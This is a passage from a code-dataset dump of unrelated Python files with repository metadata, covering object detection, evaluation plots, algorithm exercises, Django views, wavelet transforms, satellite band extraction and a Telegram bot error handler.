disp.plot(xticks_rotation='vertical', ax=ax, values_format=\"d\")\n plt.savefig(os.path.join(test_directory, 'cm_onlydetected.svg'), format=\"svg\")\n\n # 2. CM including only the detected true label, normalized\n # Note: the normalized matrix option is bugged in the plot_confusion_matrix function from sklearn\n # Thus I normalize the matrix here before plotting and don't use the option\n mcm = mcm.astype('float') / mcm.sum(axis=1)[:, np.newaxis] * 100\n mcm = mcm.round(1)\n disp = ConfusionMatrixDisplay(confusion_matrix=mcm, display_labels=pairs.dropna().name_true.unique())\n fig, ax = plt.subplots(figsize=(10,10))\n disp.plot(xticks_rotation='vertical', ax=ax, values_format=\".1f\")\n plt.savefig(os.path.join(test_directory, 'cm_norm_onlydetected.svg'), format=\"svg\")\n\n # 3. CM including only the undetected true label (Nan)\n mcm = confusion_matrix(pairs.name_true.fillna('NaN'), pairs.name_pred.fillna('NaN'), labels = pairs.fillna('NaN').name_true.unique())\n disp = ConfusionMatrixDisplay(confusion_matrix=mcm, display_labels=pairs.fillna('NaN').name_true.unique())\n fig, ax = plt.subplots(figsize=(10,10))\n disp.plot(xticks_rotation='vertical', ax=ax, values_format=\"d\")\n plt.savefig(os.path.join(test_directory, 'cm_inclNaN.svg'), format=\"svg\")\n\n #plot_confusion_matrix(mcm, np.append(pairs.name_true.unique(), 'NaN'),\n # write=os.path.join(output_directory, \"test_results/cm_inclNaN.png\"))\n\n # 4. CM including only the undetected true label (Nan), normalized\n mcm = mcm.astype('float') / mcm.sum(axis=1)[:, np.newaxis] * 100\n mcm = np.nan_to_num(mcm.round(1))\n disp = ConfusionMatrixDisplay(confusion_matrix=mcm, display_labels=pairs.fillna('NaN').name_true.unique())\n fig, ax = plt.subplots(figsize=(10,10))\n disp.plot(xticks_rotation='vertical', ax=ax, values_format=\".1f\")\n plt.savefig(os.path.join(test_directory, 'cm_norm_inclNaN.svg'), format=\"svg\")\n\n print(\"\\n---------------Finished Evaluation---------------\")\n\n return pairs, cls_value_counts, df_ttruth, df_pred\n","repo_name":"stasys-hub/Collembola_AI","sub_path":"src/evaluate/evaluation_functions.py","file_name":"evaluation_functions.py","file_ext":"py","file_size_in_byte":20403,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"48"} +{"seq_id":"74905354705","text":"# 0을 완료하기 위해서는 1을 끝내야 한다는 것을 [0,1] 쌍으로 표현하는 n개의 코스가 있다.\n# 코스 개수 n과 이 쌍들을 입력으로 받았을 때 모든 코스가 완료 가능한지 판별하라.\nimport collections\ndef canFinish(numcCourses, prerequisites):\n graph = collections.defaultdict(list)\n # 그래프 구성\n for x, y in prerequisites:\n graph[x].append(y)\n\n traced = set()\n visited = set()\n\n def dfs(i):\n # 순환 구조이면 False\n if i in traced:\n return False\n # 이미 방문햇던 노드이면 True\n if i in visited:\n return True\n\n traced.add(i)\n for y in graph[i]:\n if not dfs(y):\n return False\n # 탐색 종료 후 순환 노드 삭제\n traced.remove(i)\n # 탐색 종료 후 방문 노드 추가\n visited.add(i)\n\n return True\n # 순환 구조 판별\n for x in list(graph):\n if not dfs(x):\n return False\n return True\n \n\n\n","repo_name":"limnyn/python_codingtest","sub_path":"Algorithm_Interview/39_코드스케줄.py","file_name":"39_코드스케줄.py","file_ext":"py","file_size_in_byte":1056,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"33377747205","text":"def hill_climbing(problem):\n current = problem.initial()\n while True:\n neighbors = problem.neighbors(current)\n if not neighbors:\n break\n next_ = max(neighbors, key=problem.value)\n if problem.value(next_) <= problem.value(current):\n break\n current = next_\n return current\n #only implementation","repo_name":"Tri-M/Semester-6","sub_path":"AI/hill_climb.py","file_name":"hill_climb.py","file_ext":"py","file_size_in_byte":358,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"71725283026","text":"\"\"\"\n给你一棵根为 root 的二叉树,请你返回二叉树中好节点的数目。\n\n“好节点”X 定义为:从根到该节点 X 所经过的节点中,没有任何节点的值大于 X 的值。\n\"\"\"\nclass Solution(object):\n def goodNodes(self, root):\n \"\"\"\n :type root: TreeNode\n :rtype: int\n \"\"\"\n self.res = 0\n self.dfs(root, float('-inf'))\n return self.res\n\n def dfs(self, root, maxValue):\n if not root:\n return\n if root.val >= maxValue:\n self.res += 1\n self.dfs(root.left, max(root.val, maxValue))\n self.dfs(root.right, max(root.val, maxValue))\n\n\"\"\"\nhttps://www.youtube.com/watch?v=10-xBLiytBA&t=95s 16:35\n自上而下传递当前path到目前为止的最大值,假如当前节点>=这条path之前的最大值,则记录\n\"\"\"","repo_name":"Andrewlearning/Leetcoding","sub_path":"leetcode/Tree/古城-信息的传递/1448. 统计二叉树中好节点的数目(自上而下).py","file_name":"1448. 统计二叉树中好节点的数目(自上而下).py","file_ext":"py","file_size_in_byte":847,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"2481028509","text":"def factorize(num):\n factors = [1]\n for i in range(2, int(num**0.5 + 1)):\n if (num % i == 0):\n if (i == num ** 0.5):\n factors.append(i)\n else:\n factors.extend([i, int(num / i)])\n return(factors)\n \ndef organize(num):\n return (sum(factorize(num)))\n\ndef amicable(limit):\n skippers = []\n amics = []\n for i in range(2, limit + 1):\n if (i in skippers): continue\n\n if (i == organize(organize(i))):\n if (i == organize(i)): continue\n else: amics.extend([i, organize(i)])\n skippers.append(organize(i))\n return(amics)\n\n\nprint(sum(amicable(10_000)))","repo_name":"arefmalek/ProjectEulerProblems","sub_path":"Problems/problem21/p21.py","file_name":"p21.py","file_ext":"py","file_size_in_byte":670,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"32658973679","text":"import sys\n\n# 배열을 입력받는다. 연산의 최종결과는 answer 배열처럼 나와야 한다 \narray = list(map(int, sys.stdin.readline().split()))\nanswer = sorted(array)\n\nwhile True :\n\n # 1. 첫번째가 두번째 수보다 크다면 서로 맞바꾼다. 먄약, 오름차순정렬이 완료되면 루프문을 종료한다.\n if array[0] > array[1] :\n array[0],array[1] = array[1], array[0]\n print(*array)\n if array == answer :\n break\n \n # 2. 두번째가 세번째 수보다 크다면 서로 맞바꾼다. 먄약, 오름차순정렬이 완료되면 루프문을 종료한다.\n if array[1] > array[2] :\n array[1],array[2] = array[2], array[1]\n print(*array)\n if array == answer :\n break\n\n # 3. 세번째가 네번째 수보다 크다면 서로 맞바꾼다. 먄약, 오름차순정렬이 완료되면 루프문을 종료한다. \n if array[2] > array[3] :\n array[2],array[3] = array[3], array[2]\n print(*array)\n if array == answer :\n break\n \n # 4. 네번째가 다섯번째 수보다 크다면 서로 맞바꾼다. 먄약, 오름차순정렬이 완료되면 루프문을 종료한다.\n if array[3] > array[4] :\n array[3],array[4] = array[4], array[3]\n print(*array)\n if array == answer :\n break\n \n \n# print(array)\n# print(answer)","repo_name":"KimHyungkeun/Algorithm","sub_path":"Baekjoon/구현/2947_나무조각.py","file_name":"2947_나무조각.py","file_ext":"py","file_size_in_byte":1420,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"2384102516","text":"from distutils.core import setup, Extension\nimport setup_translate\n\npkg = 'Extensions.openHAB'\nsetup (name = 'enigma2-plugin-extensions-openhab',\n version = '0.7',\n description = 'Simple openHAB client for Enigma2',\n package_dir = {pkg: 'src'},\n packages = [pkg],\n package_data = {pkg: ['../LICENSE', '*.png', '../po/*/LC_MESSAGES/*.mo']},\n cmdclass = setup_translate.cmdclass, # for translation\n)\n","repo_name":"druciak/enigma2-plugin-openhab","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":434,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"48"} +{"seq_id":"38294706659","text":"from django.shortcuts import render\nfrom django.http import HttpResponseRedirect\nfrom webtest.models import WebCase, WebCaseStep\n\n\n# Create your views here.\n\n\ndef webCase(request):\n message = ''\n if not request.session.get('is_login', None):\n message = 'Please login before browse app case Manage Page.'\n return HttpResponseRedirect('/login/')\n else:\n webcase_list = WebCase.objects.all()\n return render(request, 'webcase.html',\n {\n 'webcases': webcase_list\n })\n\n\ndef webCaseStep(request):\n message = ''\n if not request.session.get('is_login', None):\n message = 'Please login before browse app case Manage Page.'\n return HttpResponseRedirect('/login/')\n else:\n webstep_list = WebCaseStep.objects.all()\n return render(request, 'webcasestep.html',\n {\n 'webcasesteps': webstep_list\n })\n","repo_name":"Jimmax-w/AutoTest","sub_path":"webtest/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":991,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"16362978030","text":"from pathlib import Path\nimport time\n\nimport cv2\nimport numpy as np\n\nfrom Model import Model\n\n\nclass YoloModel(Model):\n def __init__(self,\n engine,\n size=320,\n config_path='models/YOLOv3/YOLOv3.cfg',\n weights_path='models/YOLOv3/YOLOv3.weights'):\n super().__init__()\n\n self.size = size\n self.confThreshold = 0.5\n self.nmsThreshold = 0.4\n\n assert size in [\n 512], f'Net size {size} not in [512]'\n assert Path(config_path).is_file() and Path(\n weights_path).is_file(), 'Not find config or weights file'\n\n self.net = cv2.dnn.readNetFromDarknet(config_path, weights_path)\n\n def setPreferableEngine(engine):\n if engine == 'gpu':\n self.net.setPreferableBackend(cv2.dnn.DNN_BACKEND_CUDA)\n self.net.setPreferableTarget(cv2.dnn.DNN_TARGET_CUDA)\n else:\n self.net.setPreferableBackend(cv2.dnn.DNN_BACKEND_OPENCV)\n self.net.setPreferableTarget(cv2.dnn.DNN_TARGET_CPU)\n\n setPreferableEngine(engine)\n\n def getOutputsNames(net):\n layersNames = net.getLayerNames()\n return [layersNames[i[0] - 1] for i in net.getUnconnectedOutLayers()]\n\n self.outputs = getOutputsNames(self.net)\n\n def get_GFLOPS(self):\n return self.net.getFLOPS((1,3,512,512))*1e-9\n\n def preprocess(self, frames):\n return frames\n\n def inference(self, frames):\n blob = cv2.dnn.blobFromImages(images=frames, scalefactor=1./255., size=(\n self.size, self.size), mean=(0, 0, 0), swapRB=True, crop=False)\n self.net.setInput(blob)\n return self.net.forward(self.outputs)\n\n def predict(self, frames):\n st = time.time()\n frames = self.preprocess(frames)\n self.preprocess_time += (time.time() - st)\n\n st = time.time()\n outs = self.inference(frames)\n self.inference_time += (time.time() - st)\n\n st = time.time()\n a, b, c = outs\n if len(frames) == 1:\n a, b, c = [a], [b], [c]\n\n boxes = []\n for i in range(len(frames)):\n box = self.postprocess(frames[i], (a[i], b[i], c[i]))\n boxes.append((frames[i], box))\n\n self.postprocess_time += (time.time() - st)\n\n self.count += len(frames)\n\n return boxes\n\n def postprocess(self, frame, outs):\n frameHeight = frame.shape[0]\n frameWidth = frame.shape[1]\n\n classIds = []\n confidences = []\n boxes = []\n # Scan through all the bounding boxes output from the network and keep only the\n # ones with high confidence scores. Assign the box's class label as the class with the highest score.\n classIds = []\n confidences = []\n boxes = []\n for out in outs:\n for detection in out:\n scores = detection[5:]\n classId = np.argmax(scores)\n confidence = scores[classId]\n if confidence > self.confThreshold:\n center_x = int(detection[0] * frameWidth)\n center_y = int(detection[1] * frameHeight)\n width = int(detection[2] * frameWidth)\n height = int(detection[3] * frameHeight)\n left = int(center_x - width / 2)\n top = int(center_y - height / 2)\n classIds.append(classId)\n confidences.append(float(confidence))\n boxes.append([left, top, width, height])\n\n # Perform non maximum suppression to eliminate redundant overlapping boxes with\n # lower confidences.\n indices = cv2.dnn.NMSBoxes(\n boxes, confidences, self.confThreshold, self.nmsThreshold)\n\n results = []\n for i in indices:\n i = i[0]\n box = boxes[i]\n left = box[0]\n top = box[1]\n width = box[2]\n height = box[3]\n results.append((classIds[i], confidences[i],\n left, top, left + width, top + height))\n\n return results\n","repo_name":"bartoszptak/Efficient_Object_Detection_Algorithms_Research","sub_path":"YoloModel.py","file_name":"YoloModel.py","file_ext":"py","file_size_in_byte":4167,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"48"} +{"seq_id":"11964230772","text":"from typing import *\nimport logging\n\nimport umsgpack\n\nimport asm2vec.model\n\n\n_model: Optional[asm2vec.model.Asm2Vec] = None\n\n\ndef init_asm2vec(model_file_name: str) -> None:\n logging.info('Initializing asm2vec from file \"%s\"', model_file_name)\n\n memento = asm2vec.model.Asm2VecMemento()\n with open(model_file_name, 'rb') as fp:\n memento_data = umsgpack.unpack(fp)\n memento.populate(memento_data)\n\n global _model\n _model = asm2vec.model.Asm2Vec()\n _model.set_memento(memento)\n\n\ndef get_asm2vec() -> asm2vec.model.Asm2Vec:\n return _model\n\n\n__all__ = ['init_asm2vec', 'get_asm2vec']\n","repo_name":"Lancern/vul-classify","sub_path":"vulcls/asm/asm2vec.py","file_name":"asm2vec.py","file_ext":"py","file_size_in_byte":611,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"15214754221","text":"# Test for dir2exercise utilities\n\nfrom pathlib import Path\nimport os.path as op\nimport shutil\nfrom pathlib import Path\n\nHERE = op.realpath(op.dirname(__file__))\nDATA_DIR = op.join(HERE, 'data')\nTHREE_GIRLS = op.join(DATA_DIR, 'three_girls')\nTHREE_GIRLS_EXTRA = op.join(DATA_DIR, 'three_girls_extra')\n\n\nfrom tempfile import TemporaryDirectory\nfrom oktools.cutils import (get_site_dict, write_ipynb, process_dir,\n grade_path, write_dir)\n\nimport pytest\n\n\ndef test_get_site_dict():\n # Check prefer course.yml to _config.yml\n fn1 = op.realpath(op.join(DATA_DIR, 'course.yml'))\n assert get_site_dict(fn1) == {'baseurl': 'https://foo.github.com/bar',\n 'baz': 'bong'}\n fn2 = op.realpath(op.join(DATA_DIR, '_config.yml'))\n assert (get_site_dict(fn2)['baseurl'] ==\n 'https://matthew-brett.github.io/cfd2019')\n\n\ndef test_smoke_and_fails():\n base_nb_root = 'three_girls'\n with TemporaryDirectory() as tmpdir:\n tmp_3g = op.join(tmpdir, 'three_girls')\n shutil.copytree(THREE_GIRLS, tmp_3g)\n tmp_nb_in = op.join(tmp_3g, base_nb_root + '_template.Rmd')\n tmp_ex_out = op.join(tmp_3g, base_nb_root + '.ipynb')\n assert op.isfile(tmp_nb_in)\n assert not op.isfile(tmp_ex_out)\n process_dir(tmp_3g)\n assert not op.isfile(tmp_ex_out)\n write_ipynb(tmp_3g, 'exercise')\n assert op.isfile(tmp_ex_out)\n grade_path(tmp_3g)\n tmp_out = op.join(tmpdir, 'out_path')\n write_dir(tmp_3g, tmp_out)\n assert op.isdir(tmp_out)\n assert op.isdir(op.join(tmp_out, 'tests'))\n all_files = [str(p) for p in Path(tmp_out).rglob('*')]\n z_list = sorted(op.relpath(f, tmp_out) for f in all_files)\n assert z_list == [\n 'tests',\n 'tests/__init__.py',\n 'tests/q_1_no_girls.py',\n 'tests/q_2_three_of_five.py',\n 'tests/q_3_three_or_fewer.py',\n 'tests/q_4_r_three_of_four.py',\n 'three_girls.ipynb',\n 'three_girls.ok']\n # Test failing exercise causes error.\n bad_ex_fname = op.join(tmp_3g, 'tests', 'q_5.py')\n with open(bad_ex_fname, 'wt') as fobj:\n fobj.write('''\ntest = {\n 'name': 'Question 5',\n 'points': 20,\n 'suites': [\n {\n 'cases': [\n {\n 'code': r\"\"\"\n >>> False\n True\n \"\"\",\n 'hidden': False,\n 'locked': False\n },\n ],\n 'scored': True,\n 'setup': '',\n 'teardown': '',\n 'type': 'doctest'\n }\n ]\n}''')\n process_dir(tmp_3g)\n write_ipynb(tmp_3g, 'exercise')\n with pytest.raises(RuntimeError):\n grade_path(tmp_3g)\n\n\ndef test_proc_test():\n # Test extras removed\n with TemporaryDirectory() as tmpdir:\n tmp_3g = op.join(tmpdir, 'three_girls')\n shutil.copytree(THREE_GIRLS_EXTRA, tmp_3g)\n tmp_out = op.join(tmpdir, 'out_path')\n write_dir(tmp_3g, tmp_out)\n out_test_pth = Path(tmp_out) / 'tests' / 'q_1_no_girls.py'\n out_test_text = out_test_pth.read_text()\n assert '-extra' not in out_test_text\n assert '>>> True' not in out_test_text\n out_test_pth = Path(tmp_out) / 'tests' / 'q_3_three_or_fewer.py'\n out_test_text = out_test_pth.read_text()\n assert '-extra' not in out_test_text\n # Test sandwiched between two sections to remove.\n assert \"'p_3_or_fewer' in vars()\" in out_test_text\n assert '>>> False' not in out_test_text\n assert \">>> 'two'\" not in out_test_text\n # Try using with_extras flag.\n tmp_out = op.join(tmpdir, 'unstripped')\n write_dir(tmp_3g, tmp_out, with_extras=True)\n out_test_pth = Path(tmp_out) / 'tests' / 'q_1_no_girls.py'\n out_test_text = out_test_pth.read_text()\n assert '-extra' in out_test_text\n assert '>>> True' in out_test_text\n out_test_pth = Path(tmp_out) / 'tests' / 'q_3_three_or_fewer.py'\n out_test_text = out_test_pth.read_text()\n assert '-extra' in out_test_text\n # Test sandwiched between two sections to remove.\n assert \"'p_3_or_fewer' in vars()\" in out_test_text\n assert '>>> False' in out_test_text\n assert \">>> 'two'\" in out_test_text\n","repo_name":"matthew-brett/oktools","sub_path":"oktools/tests/test_dir2exercise.py","file_name":"test_dir2exercise.py","file_ext":"py","file_size_in_byte":4298,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"31135898370","text":"# Genuary 2022, Jan 5\n# Task: Destroy a Square\n# Idea: Draw a Square then shuffle all the xy coords\n\n# import python libraries, install with 'pip install ....'\nimport numpy as np\nimport pandas as pd\nimport random as rn\n\n# create a square path using x & y coords\nx = list(range(0,24)) + [24]*25 + list(range(24,-1,-1)) + [0]*25\ny = [0]*25 + list(range(0,24)) + [24]*25 + list(range(24,-1,-1))\npath = list(range(0,len(x)))\n\n# create new positions for the xy coords\nnew_x = [rn.uniform(0, 24) for p in range(0, len(x))]\nnew_y = [rn.uniform(0, 24) for p in range(0, len(x))]\n\n# create data frame for square\nd = {'x': x, 'y': y,'path': path,'stage':1}\ndf = pd.DataFrame(data=d)\n\n# create data frame for square after being shuffled\nd_new = {'x': new_x, 'y': new_y,'path': path,'stage':2}\ndf_new = pd.DataFrame(data=d_new)\n\n# combine data frames\ndf = pd.concat([df,df_new])\n\n# write data to csv\ndf.to_csv('data\\\\05_destroy_a_square.csv', encoding='utf-8-sig', index=False)\n","repo_name":"wjsutton/genuary_2022","sub_path":"05_destroy_a_square.py","file_name":"05_destroy_a_square.py","file_ext":"py","file_size_in_byte":966,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"37536917519","text":"import sys\n\nchar_pairs = {\n '(': ')',\n '[': ']',\n '{': '}',\n '<': '>'\n}\n\nillegal_character_scores = {\n ')': 3,\n ']': 57,\n '}': 1197,\n '>': 25137\n}\n\nsyntax_error_score = 0\n\nfor line in sys.stdin:\n chunk_stack = []\n illegal_char = None\n\n for char in line:\n if char in char_pairs.keys():\n chunk_stack.append(char_pairs[char])\n elif char in char_pairs.values():\n expected_char = chunk_stack.pop()\n\n if char != expected_char:\n illegal_char = char\n break\n\n if illegal_char is not None:\n syntax_error_score += illegal_character_scores[illegal_char]\n\nprint(syntax_error_score)\n","repo_name":"cycleseven/advent-2021","sub_path":"10/part_1.py","file_name":"part_1.py","file_ext":"py","file_size_in_byte":689,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"6914608501","text":"import numpy as np\nimport h5py\nfrom pyhdf.SD import SD, SDC\nimport gdal\nimport os\nimport matplotlib.pyplot as plt\nfrom pathlib import Path\n\n# f = h5py.File('MYD09GA.A2019116.h10v05.006.2019118025813.hdf', 'r')\n# ls = list(f.keys())\n# f.close()\n\n# print(ls)\n\ndef updateGeoTransforms(srcGeo, xOff, yOff):\n \"\"\"\n Create a new geotransform list based on a source geoTransform and an offset\n Returns a list of 6\n :param srcGeo: The geoTransfor of the uncroped dataset retrieved using GetGeoTransform()\n :param xOff: x offset used for cropping\n :param yOff: y offset used for cropping\n \"\"\"\n out = [srcGeo[0] + xOff * srcGeo[1], srcGeo[1], srcGeo[2], srcGeo[3] + yOff * srcGeo[5], srcGeo[4], srcGeo[5]]\n return out\n\n\n\ndirectory = os.getcwd() + '\\\\MQ\\\\'\npathlist = Path(directory).iterdir()\n\nfor path in pathlist:\n\n\n #name = 'MYD09GA.A2019116.h10v05.006.2019118025813.hdf'\n #sds = gdal.Open(name, gdal.GA_ReadOnly).GetSubDatasets()\n\n sds = gdal.Open(str(path), gdal.GA_ReadOnly).GetSubDatasets()\n\n #print(sds[1])\n\n vi = gdal.Open(sds[1][0])\n vi_np = vi.ReadAsArray()\n #print(vi_np.shape)\n\n #plt.imshow(vi_np)\n #plt.show()\n\n geoT = vi.GetGeoTransform()\n proj = vi.GetProjection()\n\n filename = str(os.path.basename(path))[:str(os.path.basename(path)).find(\".hdf\")] + '_B1.tif'\n ##outfile_name = 'new.tif'\n\n\n driver = gdal.GetDriverByName('GTiff')\n\n width = 4800\n height = 4800\n xOff = 0\n yOff = 0\n\n #dataset = driver.Create(filename, width, height, 1, gdal.GDT_Int16)\n dataset = driver.Create(filename, width, height, 1, gdal.GDT_UInt16)\n dataset.SetGeoTransform(updateGeoTransforms(geoT, xOff, yOff))\n dataset.SetProjection(proj)\n dataset.GetRasterBand(1).SetNoDataValue(0)\n dataset.GetRasterBand(1).WriteArray(vi_np)","repo_name":"Rohit18/DREDN","sub_path":"SampleData/DataPrep/MODISbandextract.py","file_name":"MODISbandextract.py","file_ext":"py","file_size_in_byte":1806,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"48"} +{"seq_id":"18565458494","text":"import torch\r\nimport torch.nn as nn\r\n\r\n\r\ndef Normalize(x):\r\n ymax = 255\r\n ymin = 0\r\n xmax = x.max()\r\n xmin = x.min()\r\n return (ymax-ymin)*(x-xmin)/(xmax-xmin) + ymin\r\n\r\n\r\ndef dwt_init(x):\r\n\r\n x01 = x[:, :, 0::2, :] / 2\r\n x02 = x[:, :, 1::2, :] / 2\r\n x1 = x01[:, :, :, 0::2]\r\n x2 = x02[:, :, :, 0::2]\r\n x3 = x01[:, :, :, 1::2]\r\n x4 = x02[:, :, :, 1::2]\r\n x_LL = x1 + x2 + x3 + x4\r\n x_HL = -x1 - x2 + x3 + x4\r\n x_LH = -x1 + x2 - x3 + x4\r\n x_HH = x1 - x2 - x3 + x4\r\n\r\n return torch.cat((x_LL, x_HL, x_LH, x_HH), 0)\r\n\r\n\r\n# 使用哈尔 haar 小波变换来实现二维离散小波\r\ndef iwt_init(x):\r\n r = 2\r\n in_batch, in_channel, in_height, in_width = x.size()\r\n out_batch, out_channel, out_height, out_width = int(in_batch/(r**2)),in_channel, r * in_height, r * in_width\r\n x1 = x[0:out_batch, :, :] / 2\r\n x2 = x[out_batch:out_batch * 2, :, :, :] / 2\r\n x3 = x[out_batch * 2:out_batch * 3, :, :, :] / 2\r\n x4 = x[out_batch * 3:out_batch * 4, :, :, :] / 2\r\n\r\n h = torch.zeros([out_batch, out_channel, out_height,\r\n out_width]).float().to(x.device)\r\n\r\n h[:, :, 0::2, 0::2] = x1 - x2 - x3 + x4\r\n h[:, :, 1::2, 0::2] = x1 - x2 + x3 - x4\r\n h[:, :, 0::2, 1::2] = x1 + x2 - x3 - x4\r\n h[:, :, 1::2, 1::2] = x1 + x2 + x3 + x4\r\n\r\n return h\r\n\r\n\r\nclass DWT(nn.Module):\r\n def __init__(self):\r\n super(DWT, self).__init__()\r\n self.requires_grad = False # 信号处理,非卷积运算,不需要进行梯度求导\r\n\r\n def forward(self, x):\r\n return dwt_init(x)\r\n\r\n\r\nclass IWT(nn.Module):\r\n def __init__(self):\r\n super(IWT, self).__init__()\r\n self.requires_grad = False\r\n\r\n def forward(self, x):\r\n return iwt_init(x)\r\n","repo_name":"JianghaiSCU/Diffusion-Low-Light","sub_path":"models/wavelet.py","file_name":"wavelet.py","file_ext":"py","file_size_in_byte":1761,"program_lang":"python","lang":"en","doc_type":"code","stars":49,"dataset":"github-code","pt":"48"} +{"seq_id":"74392143826","text":"import asyncio\nimport html\nimport io\nimport random\nimport sys\nimport traceback\n\nimport pretty_errors\nfrom telegram import InlineKeyboardButton, InlineKeyboardMarkup, Update\nfrom telegram.ext import CallbackContext, CommandHandler\n\nfrom NekoRobot import DEV_USERS, ERROR_LOGS, NEKO_PTB\n\nfrom ..utils.pastebin import paste\n\npretty_errors.mono()\n\n\nclass ErrorsDict(dict):\n \"\"\"A custom dict to store errors and their count\"\"\"\n\n def __init__(self, *args, **kwargs):\n self.raw = []\n super().__init__(*args, **kwargs)\n\n def __contains__(self, error):\n self.raw.append(error)\n error.identifier = \"\".join(random.choices(\"ABCDEFGHIJKLMNOPQRSTUVWXYZ\", k=5))\n for e in self:\n if type(e) is type(error) and e.args == error.args:\n self[e] += 1\n return True\n self[error] = 0\n return False\n\n def __len__(self):\n return len(self.raw)\n\n\nerrors = ErrorsDict()\n\n\ndef error_callback(update: Update, context: CallbackContext):\n if not update:\n return\n if context.error not in errors:\n try:\n stringio = io.StringIO()\n pretty_errors.output_stderr = stringio\n output = pretty_errors.excepthook(\n type(context.error),\n context.error,\n context.error.__traceback__,\n )\n pretty_errors.output_stderr = sys.stderr\n pretty_error = stringio.getvalue()\n stringio.close()\n except:\n pretty_error = \"Failed to create pretty error.\"\n tb_list = traceback.format_exception(\n None,\n context.error,\n context.error.__traceback__,\n )\n tb = \"\".join(tb_list)\n pretty_message = f'{pretty_error}\\n-------------------------------------------------------------------------------\\nAn exception was raised while handling an update\\nUser: {update.effective_user.id}\\nChat: {update.effective_chat.title if update.effective_chat else \"\"} {update.effective_chat.id if update.effective_chat else \"\"}\\nCallback data: {update.callback_query.data if update.callback_query else \"None\"}\\nMessage: {update.effective_message.text if update.effective_message else \"No message\"}\\n\\nFull Traceback: {tb}'\n\n e = html.escape(f\"{context.error}\")\n link = asyncio.run(paste(pretty_message))\n context.bot.send_message(\n ERROR_LOGS,\n text=f\"#{context.error.identifier}\\nAn Error has occurred:\"\n f\"\\n{e}\",\n reply_markup=InlineKeyboardMarkup(\n [[InlineKeyboardButton(\"See Errors\", url=link)]],\n ),\n parse_mode=\"html\",\n )\n\n\ndef list_errors(update: Update, context: CallbackContext):\n if update.effective_user.id not in DEV_USERS:\n return\n e = dict(sorted(errors.items(), key=lambda item: item[1], reverse=True))\n msg = \"Errors List:\\n\"\n for x, value in e.items():\n msg += f\"• {x}: {value} #{x.identifier}\\n\"\n msg += f\"{len(errors)} have occurred since startup.\"\n if len(msg) > 4096:\n with open(\"errors_msg.txt\", \"w+\") as f:\n f.write(msg)\n context.bot.send_document(\n update.effective_chat.id,\n open(\"errors_msg.txt\", \"rb\"),\n caption=\"Too many errors have occured..\",\n parse_mode=\"html\",\n )\n return\n update.effective_message.reply_text(msg, parse_mode=\"html\")\n\n\nNEKO_PTB.add_error_handler(error_callback)\nNEKO_PTB.add_handler(CommandHandler(\"errors\", list_errors))\n","repo_name":"Awesome-Prince/NekoRobot-3","sub_path":"NekoRobot/modules/error_handling.py","file_name":"error_handling.py","file_ext":"py","file_size_in_byte":3593,"program_lang":"python","lang":"en","doc_type":"code","stars":47,"dataset":"github-code","pt":"48"} +{"seq_id":"38435146120","text":"from django.urls import path\nfrom . import views\nurlpatterns = [\n\n path('', views.index),\n path('loginsignup/', views.loginsignup),\n path('signup/', views.signup),\n path('loginuser/', views.loginuser),\n path('logoutuser/', views.logoutuser),\n path('profile/', views.profile),\n path('letsprofile/', views.letsprofile),\n path('buy/', views.buy),\n path('sell/', views.sell),\n path('letssell/', views.letssell),\n path('news/', views.news),\n path('winner/', views.winner),\n path('letsbuy/', views.letsbuy),\n path('letsbuymb/', views.letsbuymb),\n path('letsupdatetime/', views.letsupdatetime),\n path('letsupdatetext/', views.letsupdatetext),\n]\n","repo_name":"sns5154/Bazaar---PDPU","sub_path":"bnb/bazaar/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":686,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"71586814867","text":"from django.conf.urls import url\n\nfrom . import views\n\nurlpatterns = [\n url('^login/$', views.login, name='login'),\n url('^logout/$', views.logout, name='logout'),\n url(r'^health/messages/$', views.health_messages, name='health_messages'),\n url(r'^health/subscriptions/$', views.health_subscriptions,\n name='health_subscriptions'),\n url(r'^health/registrations/$', views.health_registrations,\n name='health_registrations'),\n url(r'^dashboard/(?P\\d+)/', views.dashboard,\n name='dashboard'),\n url('^api/v1/metric/$', views.dashboard_metric, name='dashboard_metric'),\n url('^identities/$', views.identities, name='identities'),\n url(r'^identities/(?P[^/]+)/$', views.identity,\n name='identities-detail'),\n\n url('^registrations/$', views.registrations, name='registrations'),\n url(r'^registrations/(?P[^/]+)/$', views.registration,\n name='registrations-detail'),\n url('^changes/$', views.changes, name='changes'),\n url(r'^changes/(?P[^/]+)/$', views.change,\n name='changes-detail'),\n url('^subscriptions/$', views.subscriptions, name='subscriptions'),\n url(\n '^failures/subscriptions/$',\n views.subscription_failures,\n name='subscription_failures'\n ),\n url(\n '^failures/schedules/$',\n views.schedule_failures,\n name='schedule_failures'\n ),\n url(\n '^failures/outbound/$',\n views.outbound_failures,\n name='outbound_failures'\n ),\n url(r'^subscriptions/(?P[^/]+)/$', views.subscription,\n name='subscriptions-detail'),\n url('^services/$', views.services, name='services'),\n url('^reports/$', views.report_generation, name='reports'),\n url(r'^services/(?P[^/]+)/$', views.service,\n name='services-detail'),\n url('^user_management/$', views.user_management, name='user_management'),\n 